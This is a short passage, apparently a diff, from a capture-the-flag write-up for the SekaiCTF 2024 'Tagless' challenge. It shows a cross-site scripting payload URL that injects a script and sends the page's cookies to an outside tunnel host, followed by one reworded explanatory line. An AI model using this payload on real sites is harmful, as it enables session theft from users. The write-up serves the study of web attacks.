SekaiCTF 2024 Tagless Writeup

 http://127.0.0.1:5000/?fulldisplay=1&auto_input=<script src="http://127.0.0.1:5000/a/;fetch('https://XXXXXXXX.tunnelto.dev/'.concat('',document.cookie));//"%0d/></script%0d>hello

-Broken apart, the payload is:
+Broken apart, the payload consists of the following parts:

 // the `/` page url